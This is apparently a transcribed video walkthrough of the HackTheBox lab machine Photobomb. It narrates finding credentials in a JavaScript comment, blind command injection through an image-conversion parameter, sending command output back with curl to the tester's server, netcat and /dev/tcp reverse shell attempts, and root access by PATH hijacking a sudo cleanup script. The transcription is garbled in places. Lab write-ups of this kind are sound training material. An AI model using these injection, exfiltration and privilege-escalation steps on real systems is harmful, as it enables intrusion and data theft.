Hey, what's up, everyone, and welcome back to another episode of Naked CTF. I'm Jono from OpenLearnSec, and in this Naked CTF series, I will attempt to compromise and own a server from HackTheBox. It's my first attempt. I've not solved it beforehand, nor read anything about it, so it's one take with no editing. This could be a 30-minute video, could be 3 hours. Let's see how it goes. Today, we're going to be doing Photobomb. Easy Linux machine. Oops, haven't spawned it, so let's do that. While we're waiting, we'll grab the IP address and run our prep CTF. CTF prep, HackTheBox CTF, and then Photobomb, and we'll get the IP once it's available. Excuse me. And yeah, looking forward to this. Should be fun. Lots of machines moving into retired state recently, so they're probably only 6 months old. So it means they may be using recent vulnerabilities, not vulnerabilities from years ago. So super exciting to have a look and see. Let's grab that IP. And we're going to do that. Let's echo IP, make sure that's right. Another alias that I've added is to give me my local IP address. I'm always constantly looking that up. So now I've got it as an environment variable, echo ton0. If you want to see how I do that, it's in my little ZSH script. And yeah, so here, export ton0, we do if config, and then use a little bit of awk and cut to trim the text away and just leave us with the IP address. So that's quite helpful. Let's move into the working directory. Photobomb. Nope, that's not it. CTF HDB. How come it didn't create the... Oh, I've got the IP around the wrong way. All right, let's try that again. Okay, I can't even remember how my own aliases work. Let's quickly look it up. ZSH John. So CTF HDB name and then IP. Yeah, that should be right. Where is Photobomb? Oh, we have to start off. Cannot create directory. Oh, I got the parent directory the wrong way around. CTF HDB, not HDB CTF. There we go. Okay. So, look, I've got my own automation, but sometimes I forget how it works. So, yeah. There's a lesson in that, I'm sure. CTF HDB, Photobomb, very good. And let's check that we've got our template created. Let's go here. Photobomb, there it is. Open that guy up. And let's get our enumeration going. Nmap minus P. Let's just do connect and versioning. T4 verbose. Output is nmap1.txt and then our IP, which is the target. Oh, T4 is what we're looking for. Off it goes. Yeah, so like I said, more servers rolling off from the seasonal and challenge tracks within HackTheBox into the retired state, which is cool. Just so you're aware, from a recording and video and streaming perspective, the terms of service with HackTheBox is you can only do retired machines. So that's why we stick to that category. Okay, looks like this is done. We're going to grab all of this. Let's go. And we did all ports, which is great. let's grab this and stick it in our notes. Oops. There it is. Completed. 22 and 80. Okay, so it looks like just 2 ports here. We're going to grab all of this up to the host key. And that looks like the last chunk of the Nmap output. All right, looks good. Okay, so let's review our initial recon, figure out what we want to do. So if we look at the port level report, we've got 22. OpenSSH Ubuntu. Again, normally we're just going to leave that alone. Port 80. Plain HTTP, not HTTPS. Nginx 1.18.0. And yeah, okay, let's figure out what we start with. So let's leave SSH alone until some form of credentials identified. Port 80, HTTP. So what we can start with is we can start with a casual browse investigation of website, and we can move on to directory file enumeration if required. So let's do that. We'll grab the IP. There's no redirect towards a host name or anything like that, so we're just dealing directly with IP. We're going to force it into HTTP. Oh, it does redirect. Photobomb.htb. Okay, so it's funny, didn't see that. Oh yeah, sorry, I missed it. Did not follow redirect. Okay, so add host IP photobomb. And that should be in our, oh no, photobomb.htb. So we ping photobomb.htb. Yep, that's working as expected. Now let's do HTTP photobomb. And here it is. Welcome to your new Photobomb franchise. You'll soon be making an amazing income selling premium photographic gifts. The state-of-the-art web application is your gateway to this fantastic new life. Your wish is its command. This sounds pretty good. I should be doing this instead. To get started, please click here. So that goes to photobomb.htb/printer. The credentials are in your welcome pack. The credentials are in your welcome pack. That's pretty important to know. We'll just do a quick browse of the source code. Oh, that's not what we want. We don't want the selection. We want page source. And it's about as generic as you can get. There is this photobomb.js, which is interesting. So we'll have a look at that in a second. Nothing else. Class equals creds. Interesting. But yeah, just fairly generic HTML. Okay. Here we go. Some custom JavaScript. Jamison. This is a comment. Pre-populate creds for tech supporters. They keep forgetting them and emailing me. If document.cookie.match is photobomb tech support, set attribute get element by class name creds. So that would be this one. And set attribute href. So if you have a cookie that, if your browser presents a cookie called is photobomb tech support, it will change this URL from /printer to photobomb at photobomb.hd. This is a valid way within the URL scheme to express username, password, and then at hostname/path. So I'm assuming that if I click this link, it's going to present us with HTTP basic authentication, which is the pop-up. Let's try that. Yep, there it is. So we don't need to screw around getting a cookie together. We can just use this credentials. So let's grab this whole URL to start with. Okay, and let's put this in our notes. We have some credentials early on, which is very nice. Very nice. Okay. Basic auth for /printer path. So it's photobomb ! Okay, let's copy and paste because it's got this kind of leet speak spelling. So we don't want the semicolon in the middle because it's a delineator. And we do want BOMB exclamation and not the @ symbol. BOMB, and then I'll do an exclamation, sign in. And hey, look at that, it works. Hey, I might save this just to save me the trouble later on. And this is the application that they were talking about. So it's kind of like you pick an image, then you pick a resolution, so 3000 by 200, which is good for a mouse mat. 1000 by 1500 for a mug. Phone cover, keyring, USB stick, micro SD card. Wow, that's cool. Put a image on it. I'd like that image on a micro SD card. So then I hit download and I get a copy of the image in tiny, tiny format. Cool. Let's just keep going here. Found custom JS script, which had plain text credentials for /printer URL using basic HTTP auth. So look, I don't want to get into directory and file enumeration at the moment. I want to continue to explore this website itself. So if we have a look at the source code, we've got an input, and it looks like each one of these images is a radio button. Okay, so the radio button has a name photo, it has a value, unsplash, so it looks like it's the actual file name. And then it uses the same file name for the ID attribute of the radio button. Okay, so that just repeats over and over for each image. Form itself is called photo-form, and it posts to itself. It posts to this /printer URL. And then we have product lists, dimensions. So this is where we pick which one we want. By default, the 3000 by 2000 is selected. And then we have a submit button. So it's posting to whatever the index document is here. Here we've only got what I assume is a directory path. I wonder what is the script that's running, or the server-side language that's running behind this, because it has obviously got to do some work, right? If we look at it here, the image name gets supplied, and then a second variable, which is the image dimensions, gets supplied, and then it does some work in the background, I think, to resize this image and then throw it back to the browser. So if we do a request and then we look at here, we know that it's Nginx in front. So even though the web server is reporting as Nginx, what I suspect is that there's a Nginx instance, which is the front end or the reverse proxy, and it's actually forwarding the request back to another internal service, or another service that's listening internally and is not exposed to the internet. So we don't know we don't know authoritatively what the language is behind all this, but if I had to guess, I would guess PHP, because it's just the most common for a Linux server, server-side application. So can we mess with this? I tell you what, let's send this over to Burp and just fiddle around with some of these requests. Let's stick with the smallest one, and let's turn intercept on. Proxy intercept is on, and then send the request. That's going to pause, and we're going to forward that, and then we get a download. Yep. See how it has the original file name and then underscore, the dimensions are appended to it. So I'm kind of trying to build a picture in my head about how the server-side logic is working. And then we go back to the proxy itself. Why did we not get a log for that? Okay. We might need to try that again. Intercept, forward. Oh, okay. So what we want to do is actually turn intercept off, because we've already had a look at it, and we want to do a complete request. Why is this not giving us a proxy entry? Because what I want to do is send that request to the repeater. So, not quite sure what's going on there. Hiding CSS image and general binary content. Filtered by MIME type, HTML, script, XML, other text. Let's turn images on. Yeah, okay. Because it was returning an image file, the filter that was applied on here was not displaying it in the proxy history here. Because you can see there's a whole bunch of, here's the request, I want this file with this dimensions, and then it gives me back a file, and here's all the binary data for that file, right? So what we want to do is mess with this request. So we send it to repeater, and let's just check it works. Yep, so we get our image data back. Let's try doing, you know, an LFI, right? etc password. Invalid photo. So we may need to go up a number of directories. Let's just start with 2 and 3 and 4 and 5 and I don't know if this is gonna work. 6 and 7 and 8 and 9. I can't believe it'd be this deep, right? Okay, so it's saying invalid photo. Okay, so let's revert it back to the original. Now, what would be good is if we could get a hold of the source code. I wonder what the validation is that's happening on the server side to come up with this invalid photo. Like if it's looking at a static list of images, or there's some validation on file type. I don't know. So let's just try. If we look at the path to these images, inspect UI underscore images. So if I look at UI underscore images, oh, there we go. So this is Sinatra. So look at that. There's a common, which I think is actually an OWASP top 10, is that the kind of default debug messages are not turned off. And, you know, or the web server will show exceptions or errors or whatever it might be. Like if I do a 404. Yeah, okay. Sinatra. So, very likely server-side framework is Sinatra. New York, New York. Sinatra. Yep. Okay. So that gives us something to work with. Sinatra web framework. Let's read a little bit about it because I don't fully understand it. Let's turn that off. Okay. Refresh. Sinatra is a DSL for quickly creating web. Oh, okay, yeah. It's like a sister to Ruby on Rails, yeah. So the first thing I want to do is Actrix Sinatra server-side template injection. Okay. Let's have a look. Because that's what I'm thinking at the moment, is we want to do some sort of injection attack here and see what we can get. Like, a good first step would be to get the code for this page. Then we can understand we could understand sorry, just let me do this. Printer. Now, this URL printer is not going to be like a physical directory. This will be a route within the web application. So, okay. Let's try some... Yeah, let's try some of this. Let's see if we get a result here. Like it will actually evaluate this expression. I don't actually know if this is the right... source photo does not exist. Okay. Now, it doesn't spit out the number 49. But it's a different error to what we were getting before. Okay, let's read a little bit more. Java, let's say Sinatra. Nothing specific there. What about Ruby? ERB. Ruby. So I'm wondering, let's get rid of that. Close that. So let's review. The form posts to itself, or the posts to this /printer route in the web application. It includes a file name and a dimension, and then something is going on in the web app to return that. So what do we want to do? Like, what's the directory structure of a Sinatra application? Sinatra web. Web app structure. Okay. Yeah, maybe app.rb. Yeah, so maybe we're in a controller directory, which is where our printer logic is running. So let's try and get app.rb. Maybe it's the same directory. How about upper directory? Invalid photo. Invalid photo. Do we need to change this file type? Like text? Source photo does not exist. So that's explicitly saying couldn't find the file. Yeah, so the difference there is invalid photo, which I think means it does exist. But if I keep changing the path, it keeps saying invalid photo. But if I do it in the same directory, source photo does not exist. Okay. Let's have a look. So I'm wondering if the other thing that we could do is that the value being passed in here is actually being sent to a shell, like that uses ImageMagick or some other tool to resize it. And if we can potentially poison that shell, the command itself. So many avenues to pursue. I mean, we could just try it. Source photo does not exist. So there's definitely some form of validation that's going on in this application. What if we just leave this blank? Yeah, there's definitely some form of, if we put a backtick in there, because we're not getting like 500 or anything like that, so we're not breaking the app. Okay, Sinatra SSTI. Yeah, really we want Ruby SSTI, right? Ruby SSTI. Does Sinatra use ERB? So ERB is embedded. It's like a templating language that lets you embed Ruby code within HTML. And it kind of, okay, that's routes. Template. Yeah. Index.erb. Let's try that. Index.erb. Nope. Maybe up one directory. That is going to be more than one directory. Invalid photo. So invalid photo versus source photo does not exist. So if I go up a directory, up two directories, but I would expect if I go like this behavior where it gives source photo does not exist versus that invalid photo kind of is the difference between, for me, from the server-side logic perspective would be, is it, is the file that's being passed actually found on the local file system or not? But I still get that same invalid photo and not file not found. Yeah, okay. Let's try this. Something a little bit more embedded. Okay, something going on with my mouse. So let's turn on encode as you type. Let's get rid of that. Okay. Percent equals time dot now percent close bracket. And then we get rid of this. Source photo does not exist. Yeah, because I doubt it's actually evaluating that code. So we're looking more at a LFI rather than, I don't know yet. Okay, so ERB, Haml, which is another templating language. ERB. Yeah, Haml, ERB, Builder. Nokogiri, Liquid, a lot of different choices here. Let's try a few more. Ruby ERB template injection. So that's what the template looks like on the server side. And then when it's rendered, the Ruby interpreter sees this percent, and then equal means output or echo. And then this variable name. So we're more along the lines of Ruby Sinatra LFI. Stubbed exploit payloads. Yeah, we weren't doing URL encoding before, were we? So let's just try app.rb. Right. And then let's do, yeah, it doesn't need to be URL encoded necessarily. So this is quite old, 2018, 201 or higher. Let's do this. Let's see if we can fingerprint the actual version. Look at the source on this page. Ah, okay. Yeah, so that broken image on the Sinatra page here. So Sinatra is listing on the local interface 4567. So you've got the Nginx on port 80 forwarding these requests to this host. So if we do this underscore Sinatra, maybe. Sinatra. Nope. No route. No routes. So I don't think we can abuse the route, so to speak. Look, let's do some, I said I wasn't going to do it, but just to be sure. Let's do some file enumeration. File. Should we do file or directory? I think we're going to have to do both. Okay, so we want to do buff -u http photobomb dot hdb/fuzz. Word list is going to be user share word lists sec this discovery web content directory list let's just do small 2.3 small 2.3 small. That's directory. Printer friendly. So we do this right. Printers, printer friendly. That's 401, 401, 401. So now that we're authenticated, we know /printer. What is /printers? Nothing. Printer friendly. Nothing. Alright, we'll let that run. Just in case we turn up something. Okay. So yeah, let's try the syntax of shell command execution. So that's going to be $ID, $. Source photo doesn't exist. Okay. Sinatra LFI. Local, oops. All that. Local file inclusion payload. Flexible file inclusion update. That's a development question. Let's have a look at hack tricks. What am I missing here? Okay, that's LFI to RCE. Maybe it's doing some URL evasion. Maybe if we go decoder app.rb encode as URL. No. Yeah, but it's not a printer to. That's the home page, I guess. Yep, nothing really there. And then we want raft. Small. Words lowercase. And then we're going to need to include the extension E minus E. Minus E dot RB. We could rerun this in the /printer path. Yeah, let's do that. Printer, oh no. Buzz. Where have we gone wrong? Either W or oh yeah. Oh yeah, you see we get 401 for everything, so then we want to do EF or hash code 401. Oh, what is it? Ooh! So we want to do we want to exclude matcher. We want to exclude filter by HTTP response size. Okay. Nope, don't want that. Filter size 188. Okay. That should reduce the noise. Nothing really there. Nope. And let's do the same on the directory. Slash printer. Filter size 180. Okay. We are kind of in a jam here because I can't figure out the right combination of the photo parameter. I don't know what role the file type is playing. I don't know whether this dimensions has a hand in it. App.rb. What else is going on? I'm not sure. I think it might be time for a hint. Yep, nothing found there. Let's go into guided. I think it was 1.18.0. Yep. And then the JavaScript file was... Nope, on the home page. Photobomb.js. Photobomb.js. So it's photo, file type, and dimensions. Oh, yeah, okay. So we haven't really... Blind command injection. So it is definitely command injection. Oh, okay. It is blind, so you don't get the... callback. So why don't we do this? We can Python 3 -m HTTP dot server running on 8000. Then we're going to echo on 0, and we're going to grab that. Oh. Okay, so then we're going to come in here and do curl HTTP 8000. We didn't get a hit. Nope. So let's just spam this into, let's do test. Let's spam this into all the, well, one by one. Nothing there. Nothing there. Okay. Maybe let's do $, bracket, close bracket, send. No response. $. Nothing there. Oh boy. Okay. Nothing there. Okay. So line command injection. So we want to go What are our options? Maybe curl is not available, so let's just change that to wget just to be sure. Send. Nothing. 10.10.14.4 port 8000 / test. Contain 14.4. Okay. So we've tried that. Wonder if there is some filtering going on. Sinatra command injection. A wasp. So yeah, let's try backticks. Okay, so we get rid of that and replace with that. Then let's put it into all three values. Send. Nothing. Again, we don't know whether wget curl is usually more available by default. I think wget on Ubuntu, you need to add it as a package explicitly, but curl is part of the system base. An awful lot of manual fuzzing here. Eval system. Send. Nothing. I'm going to assume it's the... Because, I mean, if you're calling a command line tool to do the image resize, you're going to pass in let's change this back to JPEG. It'd be really good to write a fuzzing tool to do this, but that is something that I would need to do offline. So I'm gonna guess it's DIMENSI. File type? Is it file type? File type. Yeah, it is file type. Okay. So let's reset let's go back to proxy, grab our original thing. Okay, good. Yep. So file type is vulnerable. Let's just try sleep. No. We want to turn on. We want to turn on this. So let's get the payload correct. Sleep 20. No, what am I doing? Sleep 20. Sleep 20. 20. Yeah, seconds, not milliseconds. Invalid file type. So if we have a valid photo and a valid dimension, maybe we add a semicolon, or we do and. No. Why can't I get the payload right? So image magic convert. Yeah. I'm assuming it's using image magic. So if we do JPEG, like that, we'll pass the filter. Ah, there we go. Look, no response. So it needs to have a valid file type, and then we can do $ open blah, and we should get a response back any second now. It's been more than 20 seconds. Oh, there it is. Okay, so now we can do curl HTTP echo on 0 10.10.14.4 10.10.14.4 slash tests, but we want port 8000. Okay. Go. Yes, there it is. Okay, so we've got the payload now. What do we want to do? It's blind. So what can we do with a blind thing? We can... blind command injection. We really want to be able to pipe some data, right? So what would we do with some blind? We could send a mail. Yeah. Yeah, redirection. So we could write it out to a static file and then open that in the browser. But don't know if that will work because Sinatra and its routing and everything else. So we want to do who am I to test.txt run. And then if we go to the website, we had that UI images. And then test.txt. I thought it would have been in there. Maybe not. Maybe it's in here. Test.txt. We want to be able to return the data so we can do some enumeration, right? Could do DNS exfil. So we need to figure a way to get the data exfiltration. So but we don't know the web path, like the directory structure. Does Ruby have a static pages directory? Static? No. So the output's not being returned because it's escaping from a command. So yeah, we don't know where we can write it to. I guess we could try this. Curl HTTP 10.10.14.4. Yep. Port 8000 / and then backtick cat test.txt. Maybe. Oh, okay. Yeah, wizard. All right. So let's just. Nope. Go back. Uh-oh. All right. Sorry, I just had to mute myself there for a second just to deal with a family issue. All resolved. Let's close that. Let's go down here. So yeah, it looks like we've got a reasonable way of exfiltrating the output by sending it to us. So we know that our home directory is home wizard photobomb. So that's our current working directory. And if we go, let's have a look at ls minus lath home wizard. Okay. Did that work? It doesn't seem to be doing the curl now. Let's just go back to our PWD. Oops. Yep. Okay, so maybe it doesn't like ls. Send that. Okay. Try that again. Code 404 message file not found. Okay, that's because, yeah, that's what's being returned. Let's see. Let's see. Let's break this up. So instead of having a let's add a double and. Do we actually need the $sign evaluation? Okay, send that. So maybe even the current working directory. Okay, we broke it. So let's go back to this. Oh, that's because we had the parentheses on the end, but that's okay. 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 So if we actually try not printer, but the root path, do we get it? No. Let's try cat app.rb. Doesn't like that. S.txt. Let's change that to a semicolon. Okay, so let's try cat and then .user.txt. Try and get the flag at least. That's the wrong spot. Okay, let's make sure we do this right. Test.txt. Oops. There's space there. Send. Cat. Down one directory, user.txt into test.txt. Okay. There we go. That's that flag. Oops. So let's just lock in that win. Okay, let's see what else we can do. Cat. App.rb. Nothing there. So I'm assuming app.rb doesn't exist. How about index.rb? Nope. How about ls? Come on, something simple. Oops, that's the wrong one. Send. So we see the log directory. Let's see if we can get a rev shell going. This is stupid. I mean, revshells.com. We just want to do Linux and bash -i, yeah. So let's try and can we duplicate this? Okay. This one's all messed up. So look, let's grab all of this, stick it in here, and then we're going to strip this out. And then we're going to put our reverse shell code in here. Hopefully it'll work. We need to turn on. Okay. Encode as HTML. No. Encode as URL. That's it. Except that's wrong. It's 10.10.14.4. 4. Okay. Copy. 10.10.14.4. Port 1337. Let's grab that. Let's put it in repeater into here. Set up a listener, nc nvlp1337. Send it. Nothing. It's blind, but that shouldn't matter for reverse shell. Okay. Let's figure this out. Web command injection. So we know that through like this example, the ls command types into text, then we have a semicolon, then we run curl, and then we put backtick cat test.txt to include the contents. We know that works. I'm sure there's something I'm missing here. So maybe we need bin sh. And I would assume that it would have to be bin sh. I don't know. 10.10.14.4.1337, 10.10.14.4.1337. And would we expect the web request to hang? Why don't we do this? Okay, let's try this. I don't know if it's getting fully decoded. Yeah, nothing. So if I do bin sh minus I, and then at, nope, we don't want that. At dev tcp 10.10.14.4. Dev tcp 10.10.14.4.337. And then 0 greater than at 1. I hate how you lose your cursor. 0 greater than at 1. Alright, let's try. Nope, doesn't like it. Let's go back to here. And let's go back to our notes. Command execution via the file type parameter in post request blind. So let's do cat. Oh, let's also make sure we note that the Linux user wizard user context for Sinatra app. So we're going to do cat and then dot SSH authorized keys. Oh. So cat authorized keys into test.txt. Then we have a semicolon. Oh, no response back. Okay, here it is. Nothing. Cat dot then dot SSH. Huh? Where did test.txt go? Oh. Authorize keys, space. Test.txt. Test.txt curl, blah, blah, blah. Okay. Just getting an empty, I think we're just getting an empty return there. Okay, so let's do ls minus la home. ls minus la home. Okay. In fact, why are we even piping it into a file here? We can just take all this crap out, just do the curl, and then put the command in the backticks here. ls minus la home. Yeah? Nothing. Let's go back to basics, working directory. Okay, we get that. Home wizard photobomb. Let's do ls home wizard photo bomb. Maybe okay, now let's do home wizard photo. Come on. Hurry up. We're already at 1 hour 24. And we don't really have a foothold yet. Still waiting for the request to complete. ls home wizard. Okay. Just to be sure, let's send that again. Yeah, okay. It's good. Now. Doesn't work. But this does. Okay, I'm missing something here. Seems like it struggles. Let's just try some basic commands, shall we? See what's available to us. ID. Send. Yeah, it looks like it's truncating. Oh, okay. Yeah. So... it's getting truncated. Likely because... it's not URL encoded. URL encode. So let's try NC. NC connects. So we're just going to do host import 10.10.14.4.1337. I mean, if we're any luck. Oh, there it is. Oh my god, they got Netcat installed. So netcat minus ESH. Okay, kill that. Start that. Alright. Minus E bash. Send. Nope. Minus ESH. No connection. Is it because of the URL encoding? I would think not. Let's turn it off. And okay, let's check. NC. Yeah, okay. So Netcat's definitely there. Let's strip this out. And try it. Oh my god, but it... See, that works. But it's just an empty tunnel. There's nothing... NC minus CSH. NC minus CSH. Look, we don't even need all this curl bullshit. We're trying to just establish. So let's strip it back to what was working before. Okay. Send. No, we don't want that backtick. Send. Okay, there's our connection. But nothing, no process spawned on the other side. So let's try -ESH. No. Why is that getting filtered? -C. Cat. -CSH. Nothing. Come on. Why is it not working? It's so frustrating because this works. What could be causing that? If we just put -H. Program to exec after connect is -E. -C. So if I do 10.10.10, 14.4, 10.10.14.4, 1337, right? Connection refused? Oh, because something's already on there. Hello. Okay. Now if I do -E SH. Okay. Bin SH. Still get nothing. Let's do -C SH. Still get nothing. Okay. netcat reverse shell. C minus E bin bash. Okay, so if we try that. Kill that, start that. NC minus E bin bash. This is weird. Okay. Let's get our web server going again. And the hints are pointing us towards sudo. I'm really annoyed that I can't get a shell. No, we're going to want to do that here, aren't we? So we're going to want to do curl http 10.10.14.4 8000 backtick. Send. Yeah. Oh boy, this is a little bit annoying. Like, we know that netcat is there. But what is... I mean, I can't even get it to work locally. I listen there. And then I connect here. Is it bash minus I? Python 3 import pty spawn Jesus, can't remember. Spawn import pty dot spawn bin bash close. Like, it's invoking... Okay, I'm definitely doing something wrong here. Netcat. Traditional. Yeah, that's what we're doing, I thought. Start the listener. Come down here. Let's try NC minus C bash. Nothing. Netcat reverse shell. Let's think about this. Netcat reverse shell no bash. Maybe on the listener side we could do bin bash. No. Minus E in bash. And then if we just connect. Oh my goodness. Okay. So let's start a listener on here. NC minus NVLP 1010. Let's do order port 8888. Minus E bin bash. Run. I would expect this to web request not to return. So NC minus NVLP 8888 minus E bin eight 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 IP. NVLP. Oh boy. I am just having a really bad time with this. So I'm going to do something that I don't do very often at all. And that is look at the write-up. I'm a little bit sad about that. But there is something obvious that I'm missing, and it's an hour 44 already, 45. And this thing is taking forever. HDB Photobomb. Oh, there we go. Source code analysis. Oh my god. Exploiting Unix path variables. Maybe that's an avenue that we didn't look at. Okay, we got all that. We got all that. Got all that. But so it's using a semicolon in the request, which we are not doing. We are using a space, and then we are using this $bash evaluation. So I'm gonna get rid of that. I'm gonna get rid of that. And I'm gonna do ls minus lath. No, because I'm not gonna get the output. Okay. NC minus NVLP 8888 minus E bin bash. Send it. Okay, so they were pinging back themselves and then looking at the TCP dump to see the ping commands. Okay, so they're not doing a reverse. They're doing a reverse shell, whereas we're trying to do a direct shell, if that makes sense. Oh, Python payload. Oh, look, he used 8888 as well. Alright, so it looks like we simply should have been more thorough in terms of... Let's grab this. Let's use their payload. Little bit sad, had to go the right up, but it is what it is. M10 14.4. Let's go up here. Let's go up here. Start a listener on 8888. Whoops. And let's try this. Ooh, didn't like that. I feel like something is screwy here. Yeah, line breaks. There we go. Try again. Finally. Bin bash. Fine. 3 minus C import pty pty dot spawn bin bash. Okay. This is the, oh yeah, there's my test.txt. Server.rb was the one. We were looking for app.rb. And then if we look here, we already got the user txt. So the hints mentioned sudo. And we've got this opt cleanup. So let's have a look at that. Home wizard photobomb. Clean up log files. So if minus f log slash photobomb.log and minus l, that's existence. I don't know what minus l is. Then rotate and truncate the current one. Protect the priceless originals. So I'm assuming there's something vulnerable about this script that we need to figure out. So it starts with bash. It imports the opt. So let's imports the opt.bash rc file, which is it does have some edits in here, right? Like this Jameson guy. Cause problems with testing whether to rotate the log file. Ensure that snaps don't interfere because they are dumb. Aww. Okay. It's all commented out. All right. Cat, opt. Let's see what else is in there. Yeah, so cat, opt, cleanup.sh. What is this? Source images. Going to be the directory, right? I think that given this has got an exec command, we might be able to abuse this. What is it? It's cleanup.sh. Sudo -l. Opt cleanup.sh. Which binary is enabled in the bash rc? Cat opt.bash rc. Okay, we need to carefully review this. Ensure that snaps don't interfere. Okay. So yeah, enable is using for setting sysctl. Okay. Bash. Oops. Bash. Oh, what is going on? Bash. I can't remember what this array or this variable means in bash. Test, yeah. I have a feeling that this is something that is exploitable or that we can use to spawn a shell as this is run by sudo. That's the prompt, ps1. This is all commented out. Sudo hint. We don't really care about. Then we go back to the top, bash rc. With that hash is a comment, yeah. is only a single character. Enable minus n. Okay. I'm a little bit lost, I gotta admit. So it runs every 5 minutes. We can run it with elevated privileges. Moreover, for this one command, we may also set environment variables. Okay, I did miss that. So if we do sudo minus L, yeah, set env. Can't edit the script. Yep. Okay, so do a diff. We can see that the enable command disables the built-in shell command left bracket. Importantly, this command is referenced without an absolute path like user bin, meaning that when the script is executed, all directories referenced in the path environment variable are searched for the binary. Your file mention variable. Yeah, okay. So we can create a custom path. Yeah. Oh, okay. Yeah, look, I definitely wouldn't have figured that out. Without referencing the write-up. So, yeah. So we do echo, so we do touch, temp, and then a file called left bracket. And then we echo bin bash into that file. Temp, left bracket. Echo bin bash into temp slash cat temp. What am I missing? By temp bin bash cat temp. Okay. All right. Okay. Then we do sudo path equals, so we update our environment variable. So it will search /temp first. Then we run opt cleanup.sh. There we go. Okay. So yeah, it's exploiting the fact that okay, let me just get the flag. Cat root cat root.txt. So yeah. There we go. Boom. Pwned. I'm not very happy about that because I had to rely so heavily on the write-up, but that's how you learn, I guess. So what's happening here is that when the script runs, which is loaded via sudo, well, which is run as root via sudo, we have this enable -n, and that's being commented out. So effectively, the hash means that this character on the right, the right-hand bracket, is excluded, and the command is actually enable -n. That's what it's actually running. Yeah. Because I thought the hash was some weird bash control character or something. Yeah. So we create our own malicious script with a name called left-hand bracket. We put that in /temp. We poison, well, not poison, but we mess with the path evaluation order. And then I assume that when the enable -n runs, okay, so it must actually execute it at the time. So this is the bad line. This comment broke it and created the vulnerability. Yeah, so it gets executed by bash rc. All right, cool. Okay, look, that has exposed a glaring hole in my understandings of various things, which is like doing, you know, path substitution and poisoning and just, yeah, I didn't really quite understand that whole bash rc thing, what it meant. So yeah, it was an interesting box. Really enjoyed it, but a long one, 2 hours and 8 minutes. So it's been a lot of fun. If you stuck around to the end of this video, thank you very much. Have a great morning, a great afternoon, evening, nighttime, whatever time it is for you. And I'll see you in the next video. Bye-bye.